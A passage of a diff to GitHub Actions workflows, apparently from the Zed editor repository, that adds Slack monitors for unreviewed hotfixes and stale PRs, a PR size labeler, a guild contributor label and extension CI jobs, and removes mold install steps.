if [ "$MATRIX_REPO" = "workflows" ]; then
- cp zed/extensions/workflows/*.yml extension/.github/workflows/
+ cp workflow-files/*.yml extension/.github/workflows/
else
- cp zed/extensions/workflows/shared/*.yml extension/.github/workflows/
+ cp workflow-files/shared/*.yml extension/.github/workflows/
fi
env:
- REMOVED_FILES: ${{ steps.calc-changes.outputs.removed_files }}
+ REMOVED_CI: ${{ needs.fetch_extension_repos.outputs.removed_ci }}
+ REMOVED_SHARED: ${{ needs.fetch_extension_repos.outputs.removed_shared }}
MATRIX_REPO: ${{ matrix.repo }}
- id: short-sha
name: extension_workflow_rollout::rollout_workflows_to_extension::get_short_sha
run: |
- echo "sha_short=$(git rev-parse --short=7 HEAD)" >> "$GITHUB_OUTPUT"
- working-directory: zed
+ echo "sha_short=$(echo "$GITHUB_SHA" | cut -c1-7)" >> "$GITHUB_OUTPUT"
- id: create-pr
name: extension_workflow_rollout::rollout_workflows_to_extension::create_pull_request
uses: peter-evans/create-pull-request@v7
@@ -140,6 +180,8 @@ jobs:
body: |
This PR updates the CI workflow files from the main Zed repository
based on the commit zed-industries/zed@${{ github.sha }}
+
+ ${{ inputs.change-description }}
commit-message: Update CI workflows to `${{ steps.short-sha.outputs.sha_short }}`
branch: update-workflows
committer: zed-zippy[bot] <234243425+zed-zippy[bot]@users.noreply.github.com>
@@ -151,16 +193,17 @@ jobs:
- name: extension_workflow_rollout::rollout_workflows_to_extension::enable_auto_merge
run: |
if [ -n "$PR_NUMBER" ]; then
- cd extension
gh pr merge "$PR_NUMBER" --auto --squash
fi
env:
GH_TOKEN: ${{ steps.generate-token.outputs.token }}
PR_NUMBER: ${{ steps.create-pr.outputs.pull-request-number }}
+ working-directory: extension
timeout-minutes: 10
create_rollout_tag:
needs:
- rollout_workflows_to_extension
+ if: inputs.filter-repos == ''
runs-on: namespace-profile-2x4-ubuntu-2404
steps:
- id: generate-token
@@ -0,0 +1,114 @@
+# Hotfix Review Monitor
+#
+# Runs daily and checks for merged PRs with the 'hotfix' label that have not
+# received a post-merge review approval within one business day. Posts a summary to
+# Slack if any are found. This is a SOC2 compensating control for the
+# emergency hotfix fast path.
+#
+# Security note: No untrusted input (PR titles, bodies, etc.) is interpolated
+# into shell commands. All PR metadata is read via gh API + jq, not via
+# github.event context expressions.
+#
+# Required secrets:
+# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel
+
+name: Hotfix Review Monitor
+
+on:
+ schedule:
+ - cron: "30 13 * * 1-5" # 1:30 PM UTC weekdays
+ workflow_dispatch: {}
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ check-hotfix-reviews:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ env:
+ REPO: ${{ github.repository }}
+ steps:
+ - name: Find unreviewed hotfixes
+ id: check
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ # 80h lookback covers the Friday-to-Monday gap (72h) with buffer.
+ # Overlap on weekdays is harmless — reviewed PRs are filtered out below.
+ SINCE=$(date -u -v-80H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
+ || date -u -d '80 hours ago' +%Y-%m-%dT%H:%M:%SZ)
+ SINCE_DATE=$(echo "$SINCE" | cut -dT -f1)
+
+ # Use the Search API to find hotfix PRs merged in the lookback window.
+ # The Pulls API with state=closed paginates through all closed PRs in
+ # the repo, which times out on large repos. The Search API supports
+ # merged:>DATE natively so GitHub does the filtering server-side.
+ gh api --paginate \
+ "search/issues?q=repo:${REPO}+is:pr+is:merged+label:hotfix+merged:>${SINCE_DATE}&per_page=100" \
+ --jq '[.items[] | {number, title, merged_at: .pull_request.merged_at}]' \
+ > /tmp/hotfix_prs.json
+
+ # Check each hotfix PR for a post-merge approving review
+ jq -r '.[].number' /tmp/hotfix_prs.json | while read -r PR_NUMBER; do
+ APPROVALS=$(gh api \
+ "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \
+ --jq "[.[] | select(.state == \"APPROVED\")] | length")
+
+ if [ "$APPROVALS" -eq 0 ]; then
+ jq ".[] | select(.number == ${PR_NUMBER})" /tmp/hotfix_prs.json
+ fi
+ done | jq -s '.' > /tmp/unreviewed.json
+
+ COUNT=$(jq 'length' /tmp/unreviewed.json)
+ echo "count=$COUNT" >> "$GITHUB_OUTPUT"
+
+ - name: Notify Slack
+ if: steps.check.outputs.count != '0'
+ env:
+ SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }}
+ COUNT: ${{ steps.check.outputs.count }}
+ run: |
+ # Build Block Kit payload from JSON — no shell interpolation of PR titles.
+ # Why jq? PR titles are attacker-controllable input. By reading them
+ # through jq -r from the JSON file and passing the result to jq --arg,
+ # the content stays safely JSON-encoded in the final payload. Block Kit
+ # doesn't change this — the same jq pipeline feeds into the blocks
+ # structure instead of plain text.
+ PRS=$(jq -r '.[] | "• <https://github.com/'"${REPO}"'/pull/\(.number)|#\(.number)> — \(.title) (merged \(.merged_at | split("T")[0]))"' /tmp/unreviewed.json)
+
+ jq -n \
+ --arg count "$COUNT" \
+ --arg prs "$PRS" \
+ '{
+ text: ($count + " hotfix PR(s) still need post-merge review"),
+ blocks: [
+ {
+ type: "section",
+ text: {
+ type: "mrkdwn",
+ text: (":rotating_light: *" + $count + " Hotfix PR(s) Need Post-Merge Review*")
+ }
+ },
+ {
+ type: "section",
+ text: { type: "mrkdwn", text: $prs }
+ },
+ { type: "divider" },
+ {
+ type: "context",
+ elements: [{
+ type: "mrkdwn",
+ text: "Hotfix PRs require review within one business day of merge."
+ }]
+ }
+ ]
+ }' | \
+ curl -s -X POST "$SLACK_WEBHOOK_PR_REVIEW_BOT" \
+ -H 'Content-Type: application/json' \
+ -d @-
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -0,0 +1,109 @@
+# PR Size Check — Compute
+#
+# Calculates PR size and saves the result as an artifact. A companion
+# workflow (pr-size-label.yml) picks up the artifact via workflow_run
+# and applies labels + comments with write permissions.
+#
+# This two-workflow split is required because fork PRs receive a
+# read-only GITHUB_TOKEN. The compute step needs no write access;
+# the label/comment step runs via workflow_run on the base repo with
+# full write permissions.
+#
+# Security note: This workflow only reads PR file data via the JS API
+# and writes a JSON artifact. No untrusted input is interpolated into
+# shell commands.
+
+name: PR Size Check
+
+on:
+ pull_request:
+ types: [opened, synchronize]
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ compute-size:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ steps:
+ - name: Calculate PR size
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+
+ const { data: files } = await github.rest.pulls.listFiles({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ pull_number: context.issue.number,
+ per_page: 300,
+ });
+
+ // Sum additions + deletions, excluding generated/lock files
+ const IGNORED_PATTERNS = [
+ /\.lock$/,
+ /^Cargo\.lock$/,
+ /pnpm-lock\.yaml$/,
+ /\.generated\./,
+ /\/fixtures\//,
+ /\/snapshots\//,
+ ];
+
+ let totalChanges = 0;
+ for (const file of files) {
+ const ignored = IGNORED_PATTERNS.some(p => p.test(file.filename));
+ if (!ignored) {
+ totalChanges += file.additions + file.deletions;
+ }
+ }
+
+ // Assign size bracket
+ const SIZE_BRACKETS = [
+ ['Size S', 0, 100, '0e8a16'],
+ ['Size M', 100, 400, 'fbca04'],
+ ['Size L', 400, 800, 'e99695'],
+ ['Size XL', 800, Infinity, 'b60205'],
+ ];
+
+ let sizeLabel = 'Size S';
+ let labelColor = '0e8a16';
+ for (const [label, min, max, color] of SIZE_BRACKETS) {
+ if (totalChanges >= min && totalChanges < max) {
+ sizeLabel = label;
+ labelColor = color;
+ break;
+ }
+ }
+
+ // Check if the author wrote content in the "How to Review" section.
+ const rawBody = context.payload.pull_request.body || '';
+ const howToReview = rawBody.match(/## How to Review\s*\n([\s\S]*?)(?=\n## |$)/i);
+ const hasReviewGuidance = howToReview
+ ? howToReview[1].replace(/<!--[\s\S]*?-->/g, '').trim().length > 0
+ : false;
+
+ const result = {
+ pr_number: context.issue.number,
+ total_changes: totalChanges,
+ size_label: sizeLabel,
+ label_color: labelColor,
+ has_review_guidance: hasReviewGuidance,
+ };
+
+ console.log(`PR #${result.pr_number}: ${totalChanges} LOC, ${sizeLabel}`);
+
+ fs.mkdirSync('pr-size', { recursive: true });
+ fs.writeFileSync('pr-size/result.json', JSON.stringify(result));
+
+ - name: Upload size result
+ uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4.6.2
+ with:
+ name: pr-size-result
+ path: pr-size/
+ retention-days: 1
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -0,0 +1,195 @@
+# PR Size Check — Label & Comment
+#
+# Triggered by workflow_run after pr-size-check.yml completes.
+# Downloads the size result artifact and applies labels + comments.
+#
+# This runs on the base repo with full GITHUB_TOKEN write access,
+# so it works for both same-repo and fork PRs.
+#
+# Security note: The artifact is treated as untrusted data — only
+# structured JSON fields (PR number, size label, color, boolean) are
+# read. No artifact content is executed or interpolated into shell.
+
+name: PR Size Label
+
+on:
+ workflow_run:
+ workflows: ["PR Size Check"]
+ types: [completed]
+
+jobs:
+ apply-labels:
+ if: >
+ github.repository_owner == 'zed-industries' &&
+ github.event.workflow_run.conclusion == 'success'
+ permissions:
+ contents: read
+ pull-requests: write
+ issues: write
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ steps:
+ - name: Download size result artifact
+ id: download
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+ const path = require('path');
+
+ const allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ run_id: context.payload.workflow_run.id,
+ });
+
+ const match = allArtifacts.data.artifacts.find(a => a.name === 'pr-size-result');
+ if (!match) {
+ console.log('No pr-size-result artifact found, skipping');
+ core.setOutput('found', 'false');
+ return;
+ }
+
+ const download = await github.rest.actions.downloadArtifact({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ artifact_id: match.id,
+ archive_format: 'zip',
+ });
+
+ const temp = path.join(process.env.RUNNER_TEMP, 'pr-size');
+ fs.mkdirSync(temp, { recursive: true });
+ fs.writeFileSync(path.join(temp, 'result.zip'), Buffer.from(download.data));
+ core.setOutput('found', 'true');
+
+ - name: Unzip artifact
+ if: steps.download.outputs.found == 'true'
+ env:
+ ARTIFACT_DIR: ${{ runner.temp }}/pr-size
+ run: unzip "$ARTIFACT_DIR/result.zip" -d "$ARTIFACT_DIR"
+
+ - name: Apply labels and comment
+ if: steps.download.outputs.found == 'true'
+ uses: actions/github-script@ed597411d8f924073f98dfc5c65a23a2325f34cd # v8.0.0
+ with:
+ script: |
+ const fs = require('fs');
+ const path = require('path');
+
+ const temp = path.join(process.env.RUNNER_TEMP, 'pr-size');
+ const resultPath = path.join(temp, 'result.json');
+ if (!fs.existsSync(resultPath)) {
+ console.log('No result.json found, skipping');
+ return;
+ }
+
+ const result = JSON.parse(fs.readFileSync(resultPath, 'utf8'));
+
+ // Validate artifact data (treat as untrusted)
+ const prNumber = Number(result.pr_number);
+ const totalChanges = Number(result.total_changes);
+ const sizeLabel = String(result.size_label);
+ const labelColor = String(result.label_color);
+ const hasReviewGuidance = Boolean(result.has_review_guidance);
+
+ if (!prNumber || !sizeLabel.startsWith('Size ')) {
+ core.setFailed(`Invalid artifact data: pr=${prNumber}, label=${sizeLabel}`);
+ return;
+ }
+
+ console.log(`PR #${prNumber}: ${totalChanges} LOC, ${sizeLabel}`);
+
+ // --- Size label (idempotent) ---
+ const existingLabels = (await github.rest.issues.listLabelsOnIssue({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ })).data.map(l => l.name);
+
+ const existingSizeLabels = existingLabels.filter(l => l.startsWith('Size '));
+ const alreadyCorrect = existingSizeLabels.length === 1 && existingSizeLabels[0] === sizeLabel;
+
+ if (!alreadyCorrect) {
+ for (const label of existingSizeLabels) {
+ await github.rest.issues.removeLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ name: label,
+ });
+ }
+
+ try {
+ await github.rest.issues.createLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ name: sizeLabel,
+ color: labelColor,
+ });
+ } catch (e) {
+ if (e.status !== 422) throw e;
+ }
+
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ labels: [sizeLabel],
+ });
+ }
+
+ // --- Large PR handling (400+ LOC) ---
+ if (totalChanges >= 400) {
+ if (!existingLabels.includes('large-pr')) {
+ try {
+ await github.rest.issues.createLabel({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ name: 'large-pr',
+ color: 'e99695',
+ });
+ } catch (e) {
+ if (e.status !== 422) throw e;
+ }
+
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ labels: ['large-pr'],
+ });
+ }
+
+ // Comment once with guidance
+ const MARKER = '<!-- pr-size-check -->';
+ const { data: comments } = await github.rest.issues.listComments({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ });
+
+ const alreadyCommented = comments.some(c => c.body.includes(MARKER));
+ if (!alreadyCommented) {
+ let body = `${MARKER}\n`;
+ body += `### :straight_ruler: PR Size: **${totalChanges} lines changed** (${sizeLabel})\n\n`;
+ body += `Please note: this PR exceeds the 400 LOC soft limit.\n`;
+ body += `- Consider **splitting** into separate PRs if the changes are separable\n`;
+ body += `- Ensure the PR description includes a **guided tour** in the "How to Review" section so reviewers know where to start\n`;
+
+ if (hasReviewGuidance) {
+ body += `\n:white_check_mark: "How to Review" section appears to include guidance — thank you!\n`;
+ }
+
+ await github.rest.issues.createComment({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: prNumber,
+ body: body,
+ });
+ }
+ }
+
+ console.log(`PR #${prNumber}: labeled ${sizeLabel}, done`);
+defaults:
+ run:
+ shell: bash -euxo pipefail {0}
@@ -1,5 +1,6 @@
# Labels pull requests by author: 'bot' for bot accounts, 'staff' for
-# staff team members, 'first contribution' for first-time external contributors.
+# staff team members, 'guild' for guild members, 'first contribution' for
+# first-time external contributors.
name: PR Labeler
on:
@@ -29,8 +30,50 @@ jobs:
script: |
const BOT_LABEL = 'bot';
const STAFF_LABEL = 'staff';
+ const GUILD_LABEL = 'guild';
const FIRST_CONTRIBUTION_LABEL = 'first contribution';
const STAFF_TEAM_SLUG = 'staff';
+ const GUILD_MEMBERS = [
+ '11happy',
+ 'AidanV',
+ 'AmaanBilwar',
+ 'OmChillure',
+ 'Palanikannan1437',
+ 'Shivansh-25',
+ 'SkandaBhat',
+ 'TwistingTwists',
+ 'YEDASAVG',
+ 'Ziqi-Yang',
+ 'alanpjohn',
+ 'arjunkomath',
+ 'austincummings',
+ 'ayushk-1801',
+ 'claiwe',
+ 'criticic',
+ 'dongdong867',
+ 'emamulandalib',
+ 'eureka928',
+ 'feitreim',
+ 'iam-liam',
+ 'iksuddle',
+ 'ishaksebsib',
+ 'lingyaochu',
+ 'loadingalias',
+ 'marcocondrache',
+ 'mchisolm0',
+ 'mostlyKIGuess',
+ 'nairadithya',
+ 'nihalxkumar',
+ 'notJoon',
+ 'polyesterswing',
+ 'prayanshchh',
+ 'razeghi71',
+ 'sarmadgulzar',
+ 'seanstrom',
+ 'th0jensen',
+ 'tommyming',
+ 'virajbhartiya',
+ ];
const pr = context.payload.pull_request;
const author = pr.user.login;
@@ -71,6 +114,17 @@ jobs:
return;
}
+ if (GUILD_MEMBERS.includes(author)) {
+ await github.rest.issues.addLabels({
+ owner: context.repo.owner,
+ repo: context.repo.repo,
+ issue_number: pr.number,
+ labels: [GUILD_LABEL]
+ });
+ console.log(`PR #${pr.number} by ${author}: labeled '${GUILD_LABEL}' (guild member)`);
+ // No early return: guild members can also get 'first contribution'
+ }
+
// We use inverted logic here due to a suspected GitHub bug where first-time contributors
// get 'NONE' instead of 'FIRST_TIME_CONTRIBUTOR' or 'FIRST_TIMER'.
// https://github.com/orgs/community/discussions/78038
@@ -72,8 +72,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_node
@@ -199,8 +197,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -318,8 +314,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -360,8 +354,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -122,8 +122,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -170,8 +168,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -34,8 +34,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_cargo_config
@@ -32,8 +32,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -73,8 +71,6 @@ jobs:
token: ${{ secrets.SENTRY_AUTH_TOKEN }}
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/bundle-linux
@@ -35,8 +35,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_install_nextest
@@ -103,13 +103,22 @@ jobs:
check_pattern "run_action_checks" '^\.github/(workflows/|actions/|actionlint.yml)|tooling/xtask|script/' -qP
check_pattern "run_docs" '^(docs/|crates/.*\.rs)' -qP
check_pattern "run_licenses" '^(Cargo.lock|script/.*licenses)' -qP
- check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests)))' -qvP
+ check_pattern "run_tests" '^(docs/|script/update_top_ranking_issues/|\.github/(ISSUE_TEMPLATE|workflows/(?!run_tests))|extensions/)' -qvP
+ # Detect changed extension directories (excluding extensions/workflows)
+ CHANGED_EXTENSIONS=$(echo "$CHANGED_FILES" | grep -oP '^extensions/[^/]+(?=/)' | sort -u | grep -v '^extensions/workflows$' || true)
+ if [ -n "$CHANGED_EXTENSIONS" ]; then
+ EXTENSIONS_JSON=$(echo "$CHANGED_EXTENSIONS" | jq -R -s -c 'split("\n") | map(select(length > 0))')
+ else
+ EXTENSIONS_JSON="[]"
+ fi
+ echo "changed_extensions=$EXTENSIONS_JSON" >> "$GITHUB_OUTPUT"
outputs:
changed_packages: ${{ steps.filter.outputs.changed_packages }}
run_action_checks: ${{ steps.filter.outputs.run_action_checks }}
run_docs: ${{ steps.filter.outputs.run_docs }}
run_licenses: ${{ steps.filter.outputs.run_licenses }}
run_tests: ${{ steps.filter.outputs.run_tests }}
+ changed_extensions: ${{ steps.filter.outputs.changed_extensions }}
check_style:
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions')
runs-on: namespace-profile-4x8-ubuntu-2204
@@ -147,8 +156,8 @@ jobs:
file: ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- name: run_tests::run_ts_query_ls
run: |-
- tar -xf ts_query_ls-x86_64-unknown-linux-gnu.tar.gz
- ./ts_query_ls format --check . || {
+ tar -xf "$GITHUB_WORKSPACE/ts_query_ls-x86_64-unknown-linux-gnu.tar.gz" -C "$GITHUB_WORKSPACE"
+ "$GITHUB_WORKSPACE/ts_query_ls" format --check . || {
echo "Found unformatted queries, please format them with ts_query_ls."
echo "For easy use, install the Tree-sitter query extension:"
echo "zed://extension/tree-sitter-query"
@@ -209,8 +218,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -256,6 +263,39 @@ jobs:
- name: steps::show_sccache_stats
run: sccache --show-stats || true
timeout-minutes: 60
+ clippy_mac_x86_64:
+ needs:
+ - orchestrate
+ if: needs.orchestrate.outputs.run_tests == 'true'
+ runs-on: namespace-profile-mac-large
+ steps:
+ - name: steps::checkout_repo
+ uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683
+ with:
+ clean: false
+ - name: steps::setup_cargo_config
+ run: |
+ mkdir -p ./../.cargo
+ cp ./.cargo/ci-config.toml ./../.cargo/config.toml
+ - name: steps::cache_rust_dependencies_namespace
+ uses: namespacelabs/nscloud-cache-action@v1
+ with:
+ cache: rust
+ path: ~/.rustup
+ - name: steps::install_rustup_target
+ run: rustup target add x86_64-apple-darwin
+ - name: steps::setup_sccache
+ run: ./script/setup-sccache
+ env:
+ R2_ACCOUNT_ID: ${{ secrets.R2_ACCOUNT_ID }}
+ R2_ACCESS_KEY_ID: ${{ secrets.R2_ACCESS_KEY_ID }}
+ R2_SECRET_ACCESS_KEY: ${{ secrets.R2_SECRET_ACCESS_KEY }}
+ SCCACHE_BUCKET: sccache-zed
+ - name: steps::clippy
+ run: ./script/clippy --target x86_64-apple-darwin
+ - name: steps::show_sccache_stats
+ run: sccache --show-stats || true
+ timeout-minutes: 60
run_tests_windows:
needs:
- orchestrate
@@ -322,8 +362,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_node
@@ -421,8 +459,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_cargo_config
@@ -471,8 +507,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::setup_sccache
@@ -597,8 +631,6 @@ jobs:
jobSummary: false
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: ./script/generate-action-metadata
@@ -711,6 +743,20 @@ jobs:
- name: run_tests::check_postgres_and_protobuf_migrations::check_protobuf_formatting
run: buf format --diff --exit-code crates/proto/proto
timeout-minutes: 60
+ extension_tests:
+ needs:
+ - orchestrate
+ if: needs.orchestrate.outputs.changed_extensions != '[]'
+ permissions:
+ contents: read
+ strategy:
+ matrix:
+ extension: ${{ fromJson(needs.orchestrate.outputs.changed_extensions) }}
+ fail-fast: false
+ max-parallel: 1
+ uses: ./.github/workflows/extension_tests.yml
+ with:
+ working-directory: ${{ matrix.extension }}
tests_pass:
needs:
- orchestrate
@@ -718,6 +764,7 @@ jobs:
- clippy_windows
- clippy_linux
- clippy_mac
+ - clippy_mac_x86_64
- run_tests_windows
- run_tests_linux
- run_tests_mac
@@ -728,6 +775,7 @@ jobs:
- check_docs
- check_licenses
- check_scripts
+ - extension_tests
if: (github.repository_owner == 'zed-industries' || github.repository_owner == 'zed-extensions') && always()
runs-on: namespace-profile-2x4-ubuntu-2404
steps:
@@ -746,6 +794,7 @@ jobs:
check_result "clippy_windows" "$RESULT_CLIPPY_WINDOWS"
check_result "clippy_linux" "$RESULT_CLIPPY_LINUX"
check_result "clippy_mac" "$RESULT_CLIPPY_MAC"
+ check_result "clippy_mac_x86_64" "$RESULT_CLIPPY_MAC_X86_64"
check_result "run_tests_windows" "$RESULT_RUN_TESTS_WINDOWS"
check_result "run_tests_linux" "$RESULT_RUN_TESTS_LINUX"
check_result "run_tests_mac" "$RESULT_RUN_TESTS_MAC"
@@ -756,6 +805,7 @@ jobs:
check_result "check_docs" "$RESULT_CHECK_DOCS"
check_result "check_licenses" "$RESULT_CHECK_LICENSES"
check_result "check_scripts" "$RESULT_CHECK_SCRIPTS"
+ check_result "extension_tests" "$RESULT_EXTENSION_TESTS"
exit $EXIT_CODE
env:
@@ -764,6 +814,7 @@ jobs:
RESULT_CLIPPY_WINDOWS: ${{ needs.clippy_windows.result }}
RESULT_CLIPPY_LINUX: ${{ needs.clippy_linux.result }}
RESULT_CLIPPY_MAC: ${{ needs.clippy_mac.result }}
+ RESULT_CLIPPY_MAC_X86_64: ${{ needs.clippy_mac_x86_64.result }}
RESULT_RUN_TESTS_WINDOWS: ${{ needs.run_tests_windows.result }}
RESULT_RUN_TESTS_LINUX: ${{ needs.run_tests_linux.result }}
RESULT_RUN_TESTS_MAC: ${{ needs.run_tests_mac.result }}
@@ -774,6 +825,7 @@ jobs:
RESULT_CHECK_DOCS: ${{ needs.check_docs.result }}
RESULT_CHECK_LICENSES: ${{ needs.check_licenses.result }}
RESULT_CHECK_SCRIPTS: ${{ needs.check_scripts.result }}
+ RESULT_EXTENSION_TESTS: ${{ needs.extension_tests.result }}
concurrency:
group: ${{ github.workflow }}-${{ github.ref_name }}-${{ github.ref_name == 'main' && github.sha || 'anysha' }}
cancel-in-progress: true
@@ -38,8 +38,6 @@ jobs:
path: ~/.rustup
- name: steps::setup_linux
run: ./script/linux
- - name: steps::install_mold
- run: ./script/install-mold
- name: steps::download_wasi_sdk
run: ./script/download-wasi-sdk
- name: steps::cargo_install_nextest
@@ -0,0 +1,115 @@
+# Stale PR Review Reminder
+#
+# Runs daily on weekdays (second run at 8 PM UTC disabled during rollout) and posts a Slack summary of open PRs that
+# have been awaiting review for more than 72 hours. Team-level signal only —
+# no individual shaming.
+#
+# Security note: No untrusted input is interpolated into shell commands.
+# All PR metadata is read via gh API + jq.
+#
+# Required secrets:
+# SLACK_WEBHOOK_PR_REVIEW_BOT - Incoming webhook URL for the #pr-review-ops channel
+
+name: Stale PR Review Reminder
+
+on:
+ schedule:
+ - cron: "0 14 * * 1-5" # 2 PM UTC weekdays
+ # - cron: "0 20 * * 1-5" # 8 PM UTC weekdays — enable after initial rollout
+ workflow_dispatch: {}
+
+permissions:
+ contents: read
+ pull-requests: read
+
+jobs:
+ check-stale-prs:
+ if: github.repository_owner == 'zed-industries'
+ runs-on: ubuntu-latest
+ timeout-minutes: 5
+ env:
+ REPO: ${{ github.repository }}
+ # Only surface PRs created on or after this date. Update this if the
+ # review process enforcement date changes.
+ PROCESS_START_DATE: "2026-03-19T00:00:00Z"
+ steps:
+ - name: Find PRs awaiting review longer than 72h
+ id: stale
+ env:
+ GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
+ run: |
+ CUTOFF=$(date -u -v-72H +%Y-%m-%dT%H:%M:%SZ 2>/dev/null \
+ || date -u -d '72 hours ago' +%Y-%m-%dT%H:%M:%SZ)
+
+ # Get open, non-draft PRs with pending review requests, created before cutoff
+ # but after the review process start date (to exclude pre-existing backlog)
+ gh api --paginate \
+ "repos/${REPO}/pulls?state=open&sort=updated&direction=asc&per_page=100" \
+ --jq "[
+ .[] |
+ select(.draft == false) |
+ select(.created_at > \"$PROCESS_START_DATE\") |
+ select(.created_at < \"$CUTOFF\") |
+ select((.requested_reviewers | length > 0) or (.requested_teams | length > 0))
+ ]" > /tmp/candidates.json
+
+ # Filter to PRs with zero approving reviews
+ jq -r '.[].number' /tmp/candidates.json | while read -r PR_NUMBER; do
+ APPROVALS=$(gh api \
+ "repos/${REPO}/pulls/${PR_NUMBER}/reviews" \
+ --jq "[.[] | select(.state == \"APPROVED\")] | length" 2>/dev/null || echo "0")
+
+ if [ "$APPROVALS" -eq 0 ]; then
+ jq ".[] | select(.number == ${PR_NUMBER}) | {number, title, author: .user.login, created_at}" \
+ /tmp/candidates.json
+ fi
+ done | jq -s '.' > /tmp/awaiting.json
+
+ COUNT=$(jq 'length' /tmp/awaiting.json)
+ echo "count=$COUNT" >> "$GITHUB_OUTPUT"
+
+ - name: Notify Slack
+ if: steps.stale.outputs.count != '0'
+ env:
+ SLACK_WEBHOOK_PR_REVIEW_BOT: ${{ secrets.SLACK_WEBHOOK_PR_REVIEW_BOT }}
+ COUNT: ${{ steps.stale.outputs.count }}
+ run: |
